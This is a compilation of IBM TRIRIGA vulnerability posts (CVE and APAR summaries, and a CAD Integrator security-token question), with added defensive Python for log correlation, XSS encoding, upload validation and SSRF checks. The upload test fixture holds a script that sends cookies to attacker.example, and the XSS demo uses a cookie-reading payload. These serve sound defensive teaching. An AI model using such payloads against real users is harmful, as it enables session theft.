Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


[Updated 03.29.17]

For convenience, here are some recent CVE IDs. No APAR number is listed for these entries.

CVE-2016-9737
  Summary: The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
CVE-2017-1153
  Summary: The IBM TRIRIGA Report Manager contains a vulnerability that could allow authenticated users to execute actions to which they do not have access.
CVE-2017-1171
  Summary: The IBM TRIRIGA Application Platform contains a vulnerability that could allow authenticated users to execute application actions to which they do not have access.
CVE-2017-1180
  Summary: The IBM TRIRIGA Document Manager contains a vulnerability that could allow authenticated users to execute actions to which they do not have access.

[Admin: This post is related to the 05.17.16 post and the 04.04.16 post about vulnerabilities and fixes. To see other related posts, use the Vulnerability tag.]


What is causing the “TRIRIGA security token” warning in CI?


When attempting to make a connection through the CAD Integrator 12.1.3.0 client (with TRIRIGA 10.5/3.5), we are seeing the following error in the security log:

2016-11-18 10:37:55,142 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [null] From: [10.3.x.xxx] Status: [FAILED]
2016-11-18 10:37:55,705 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [jackie.lu] From: [10.3.x.xxx] Status: [SUCCESS]
2016-11-18 10:37:55,720 WARN [com.tririga.XSS] XSS potential: Request did not come in with TRIRIGA security token: /pc/ci/dispatch From: 10.3.x.xxx [MID-485378064]

The client fails to establish connection. Any thoughts on what could be causing this? We do not have SSO configured, and the FRONT_END_SERVER setting has been checked.

[Admin: The same question is also posted in the TRIRIGA Around the World Facebook group.]
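The sequence in that security log (a failed login, a successful login, then a request without the security token from the same address a few milliseconds later) is exactly the kind of thing a log-correlation rule should surface. The following Python is an added example, not part of the original post or of IBM's tooling: it parses the SecurityLogger and com.tririga.XSS line formats quoted above (copied here as constructed sample input, with the address masked as it was in the post) and, for each missing-token warning, reports whether an authenticated session from the same address preceded it. The five-second window and the verdict labels are the example's own assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the three lines quoted in the post above, with the
# source address already masked as it appears there. No live log is read.
SAMPLE_LOG = """\
2016-11-18 10:37:55,142 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [null] From: [10.3.x.xxx] Status: [FAILED]
2016-11-18 10:37:55,705 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [jackie.lu] From: [10.3.x.xxx] Status: [SUCCESS]
2016-11-18 10:37:55,720 WARN [com.tririga.XSS] XSS potential: Request did not come in with TRIRIGA security token: /pc/ci/dispatch From: 10.3.x.xxx [MID-485378064]
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) INFO "
    r"\[com\.tririga\.architecture\.security\.logger\.SecurityLogger\] "
    r"Login Attempt -- To: \[(?P<path>[^\]]*)\] Account: \[(?P<account>[^\]]*)\] "
    r"From: \[(?P<ip>[^\]]*)\] Status: \[(?P<status>[^\]]*)\]"
)
TOKEN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) WARN \[com\.tririga\.XSS\] "
    r"XSS potential: Request did not come in with TRIRIGA security token: "
    r"(?P<path>\S+) From: (?P<ip>\S+)"
)


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S,%f")


def parse(log_text):
    """Return (kind, fields) for every recognised line; other lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = _ts(d["ts"])
            events.append(("login", d))
            continue
        m = TOKEN_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = _ts(d["ts"])
            events.append(("missing_token", d))
    return events


def correlate(log_text, window_seconds=5.0):
    """For each missing-token warning, look back at logins from the same source
    address inside the window (window length is an assumption of this example).
    A warning right after a SUCCESS means the session is real but the request
    lost the token; a warning with no successful login behind it is the pattern
    to treat as a possible forged request."""
    events = parse(log_text)
    findings = []
    for i, (kind, w) in enumerate(events):
        if kind != "missing_token":
            continue
        prior = [e for k, e in events[:i]
                 if k == "login" and e["ip"] == w["ip"]
                 and (w["ts"] - e["ts"]).total_seconds() <= window_seconds]
        successes = [e for e in prior if e["status"] == "SUCCESS"]
        last = successes[-1] if successes else None
        findings.append({
            "ip": w["ip"],
            "path": w["path"],
            "failed_logins_in_window": sum(1 for e in prior if e["status"] == "FAILED"),
            "authenticated_account": last["account"] if last else None,
            # integer division of two timedeltas gives an exact millisecond count
            "ms_after_login": (w["ts"] - last["ts"]) // timedelta(milliseconds=1) if last else None,
            "verdict": "token_dropped_after_login" if last else "no_authenticated_session",
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_LOG):
        print(finding)
```

On the quoted lines this yields a single finding: account jackie.lu authenticated from the same address 15 ms before the token-less request to /pc/ci/dispatch. That shape says the credentials were accepted and it is the request after login that the platform's token filter rejected, so the client path (CAD Integrator itself, or anything in front of the server that could strip or rewrite the request) is where to look; a finding with no authenticated session behind it is the one to treat as a possible forged request.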


IV88400: Reflected cross-site scripting (XSS)


Reflected cross-site scripting (XSS) vulnerabilities stem from data in a request being echoed unsafely into the application’s response. An attacker can construct a request that causes attacker-supplied JavaScript to execute in the user’s browser, within the context of the user’s current session. This may give the attacker access to the user’s session tokens, let them log keystrokes, or let them launch a network scan from the user’s browser. An attacker may exploit this vulnerability in conjunction with a cross-site request forgery (CSRF) attack, or by delivering a maliciously crafted link to a user in an email, chat message, or web page.

The impact of this vulnerability depends on the function of the application. In addition to session hijacking, if the application uses broadly scoped cookies the vulnerability may lead to widespread account compromise, data loss, and theft. A vulnerability of this type might also be leveraged in a phishing campaign, exploiting the trust users place in the application to attack those users.

Multiple parameters to “WebProcess.srv” were found to be vulnerable to reflected XSS when the “objectId” and “actionId” parameters are set to “840000” and “750812”, respectively.
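As an added illustration (not IBM’s code and not the change shipped in the APAR), here is the vulnerable echo pattern beside the corrected one, plus the canary check a tester uses to find which parameters come back unencoded. WebProcess.srv and the objectId/actionId values are taken from the APAR text above; the echoed parameter name searchText is a hypothetical stand-in, because the APAR does not name the affected parameters.

```python
import html
from urllib.parse import parse_qs, urlencode

# Servlet name and fixed objectId/actionId values from the APAR text; the
# parameter "searchText" is hypothetical (the APAR does not name the reflected parameters).
VULN_PATH = "/WebProcess.srv"
FIXED_QUERY = {"objectId": "840000", "actionId": "750812"}


def render_unsafe(params):
    """Vulnerable: request data is echoed straight into the HTML, in both an
    attribute context and an element context."""
    text = params.get("searchText", [""])[0]
    return (f'<input name="searchText" value="{text}">'
            f"<p>Results for {text}</p>")


def render_safe(params):
    """Fixed: HTML-encode before echoing. quote=True also encodes the quote
    characters, so the attribute value cannot be broken out of."""
    text = html.escape(params.get("searchText", [""])[0], quote=True)
    return (f'<input name="searchText" value="{text}">'
            f"<p>Results for {text}</p>")


def find_reflected(handler, param_names):
    """Tester's check: send a canary containing the characters an injection needs
    (quote, angle brackets, apostrophe) and report every parameter whose canary
    comes back unencoded. Looking for the raw canary rather than for '<script>'
    avoids false negatives when a filter strips only known tags."""
    hits = []
    for name in param_names:
        canary = f'x"<{name}>\''
        query = dict(FIXED_QUERY, **{name: canary})
        # A live test would GET VULN_PATH + "?" + urlencode(query); here the
        # handler is called directly with the parsed form of that query string.
        response = handler(parse_qs(urlencode(query)))
        if canary in response:
            hits.append(name)
    return hits


if __name__ == "__main__":
    payload = '"><script>alert(document.cookie)</script>'
    print("unsafe:", render_unsafe({"searchText": [payload]}))
    print("safe:  ", render_safe({"searchText": [payload]}))
    print("reflected (unsafe):", find_reflected(render_unsafe, ["searchText", "objectId", "actionId"]))
    print("reflected (safe):  ", find_reflected(render_safe, ["searchText", "objectId", "actionId"]))
```

Output encoding is context-specific: html.escape is right for text nodes and quoted attribute values, but a value placed inside a script block, a URL, or an unquoted attribute needs the encoding for that context instead.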


IV85103: Cross-site scripting (XSS) vulnerability


Using the trustee account (external.trustee.02) and the image upload functionality within the Maintain User Profile page, it was possible to upload an HTML file containing JavaScript when the file was renamed to JPG.

Here are the direct links to the fix packs in Fix Central:

Moving forward, the vulnerability has been identified and resolved.
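The bypass described above works because the upload check trusted the file name rather than the file content. The following Python is an added example (not TRIRIGA code and not the fix pack) of how an image upload endpoint should decide: sniff the magic bytes, require the extension to agree with what was sniffed, refuse markup inside the bytes, and serve the stored file with headers that stop the browser from reinterpreting it. The allowlist, size limit and the two sample uploads are constructed for the example.

```python
import os

# Constructed sample uploads: a minimal JPEG header, and an HTML page that will
# be submitted under a .jpg name (the bypass the APAR describes).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
HTML_AS_JPG = (b"<html><script>document.location='http://attacker.example/?c='"
               b"+document.cookie</script></html>")

# (magic bytes, canonical content type): hypothetical allowlist for a profile image.
SIGNATURES = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
]
EXT_FOR_TYPE = {
    "image/jpeg": {".jpg", ".jpeg"},
    "image/png": {".png"},
    "image/gif": {".gif"},
}


def sniff_image_type(data):
    """Decide the type from the bytes, never from the client's name or Content-Type."""
    for magic, ctype in SIGNATURES:
        if data.startswith(magic):
            return ctype
    return None


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (ok, content_type_or_reason). The extension is only required to be
    consistent with the sniffed content, so an HTML file called avatar.jpg fails."""
    if len(data) > max_bytes:
        return False, "too large"
    ext = os.path.splitext(filename)[1].lower()
    ctype = sniff_image_type(data)
    if ctype is None:
        return False, "content is not a supported image"
    if ext not in EXT_FOR_TYPE[ctype]:
        return False, f"extension {ext} does not match content {ctype}"
    # A valid image header followed by markup is the polyglot case; refuse it too.
    lowered = data.lower()
    if b"<script" in lowered or b"<html" in lowered:
        return False, "embedded markup"
    return True, ctype


def response_headers(ctype):
    """Headers for serving a stored upload: the sniffed type (not the client's),
    nosniff so the browser does not guess a different one, and a CSP that keeps
    any script that slipped through from running in the application's origin."""
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


if __name__ == "__main__":
    print(validate_upload("avatar.jpg", HTML_AS_JPG))
    print(validate_upload("avatar.jpg", JPEG_SAMPLE))
    print(validate_upload("avatar.jpg", JPEG_SAMPLE + b"<script>alert(1)</script>"))
    print(response_headers("image/jpeg"))
```

Serving user uploads from a separate, cookie-less origin removes the remaining risk that any file, however validated, is rendered with the application's session attached.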


Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


[Updated 06.15.16 to add CVE-2016-2883 (2).]

[Updated 06.10.16 to add CVE-2016-2882.]

[Updated 05.31.16 to add CVE-2016-2883 (1).]

For convenience, here are some recent CVE IDs. No APAR number is listed for these entries.

CVE-2016-0362
  Summary: The IBM TRIRIGA Application Platform allows remote attackers to use one of its web services as a proxy to forward HTTP requests to other internal or external web resources.
CVE-2016-0374
  Summary: The IBM TRIRIGA Application Platform builder tools are vulnerable to a privilege escalation attack that can give a user without access the ability to modify TRIRIGA applications.
CVE-2016-0386
  Summary: The IBM TRIRIGA Application Platform is vulnerable to cross-site request forgery (CSRF), caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious website, a remote attacker could send a malformed HTTP request. An attacker could exploit this vulnerability to perform cross-site scripting (XSS) attacks, web cache poisoning, and other malicious activities.
CVE-2016-0387
  Summary: The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting (XSS), caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute script in a victim’s web browser within the security context of the hosting website, once the URL is clicked. An attacker could use this vulnerability to steal the victim’s cookie-based authentication credentials.
CVE-2016-2882
  Summary: The IBM TRIRIGA Application Platform could disclose some sensitive server information through URL request responses that could aid an attacker in further attacks against the system.
CVE-2016-2883 (1) and CVE-2016-2883 (2), added 05.31.16 and 06.15.16 respectively
  Summary (same for both entries): The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting (XSS), caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute script in a victim’s web browser within the security context of the hosting website, once the URL is clicked. An attacker could use this vulnerability to steal the victim’s cookie-based authentication credentials.
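CVE-2016-0362 has the classic server-side request forgery shape: a web service that forwards HTTP requests to a caller-supplied destination. As an added example (not IBM code; the page does not say which service is affected or which destinations it is meant to reach), here is the outbound-target check such a forwarding service should apply before it makes a request. The host allowlist and the permitted scheme and port are hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical: the only destinations this forwarding service is meant to reach.
ALLOWED_HOSTS = {"reports.example.com", "maps.example.com"}
ALLOWED_SCHEMES = {"https"}
ALLOWED_PORTS = {None, 443}


def is_internal_literal(host):
    """True when host is an IP literal in a loopback, link-local, private,
    multicast, reserved or unspecified range (cloud metadata lives in 169.254/16)."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False  # a name, not a literal; the allowlist handles names
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_forward_target(url):
    """Return (allowed, host_or_reason). Only an exact allowlisted host over an
    allowed scheme and port passes; credentials in the URL and internal IP
    literals are refused outright, so 'https://good@evil/' and the metadata
    address both fail."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "no host"
    if is_internal_literal(host):
        return False, "internal address"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not in allowlist"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, host


if __name__ == "__main__":
    for candidate in [
        "https://reports.example.com/run?id=1",
        "https://169.254.169.254/latest/meta-data/",
        "https://reports.example.com@evil.example/",
        "http://reports.example.com/",
        "https://[::1]/admin",
        "https://REPORTS.example.com./x",
        "https://reports.example.com:8443/",
    ]:
        print(candidate, "->", check_forward_target(candidate))
```

This validates the literal the caller supplied. Two things it cannot see still need handling in the HTTP client: redirects (the allowlisted host may 302 to an internal one, so follow none) and DNS rebinding (resolve the name, apply the same internal-range test to the addresses, and connect to the address you checked).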

[Admin: This post is related to the 04.04.16 post about vulnerabilities and fixes. To see other related posts, use the Vulnerability tag.]


Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


For convenience, here are some recent CVE IDs and their related APARs (where one is listed).

CVE-2016-0300
  Summary: The IBM TRIRIGA Application Platform has a security flaw that, under certain circumstances, could grant unauthenticated access to all JSP pages within the application structure, which may allow subsequent probing and exploitation.
CVE-2016-0312
  Summary: The IBM TRIRIGA Application Platform has a security flaw that grants unauthenticated access to Document Manager in IBM TRIRIGA Application Platform versions prior to 3.3.2 only. Anyone running IBM TRIRIGA Application Platform 3.3.2 or higher is not impacted by this vulnerability.
CVE-2016-0342
  Summary: The IBM TRIRIGA Application Platform allows a user to read or modify a report for which the user does not have privileges.
  APAR: IV82437
CVE-2016-0343
  Summary: IBM TRIRIGA could allow an authenticated user to obtain sensitive information displayed in error messages.
  APAR: IV82433
CVE-2016-0344
  Summary: The IBM TRIRIGA Application Platform is vulnerable to a cross-site scripting (XSS) attack within My Reports.
  APAR: IV82435
CVE-2016-0345
  Summary: The IBM TRIRIGA Application Platform disclosed server file path information when BIRT reports were rendered; with the fix it no longer does.
  APAR: IV82438
CVE-2016-0346
  Summary: Unauthenticated requests can be made to a vulnerable web application, which then performs unauthorized actions on behalf of the attacker.
  APAR: IV82436

[Admin: To see other related posts, use the Vulnerability tag.]
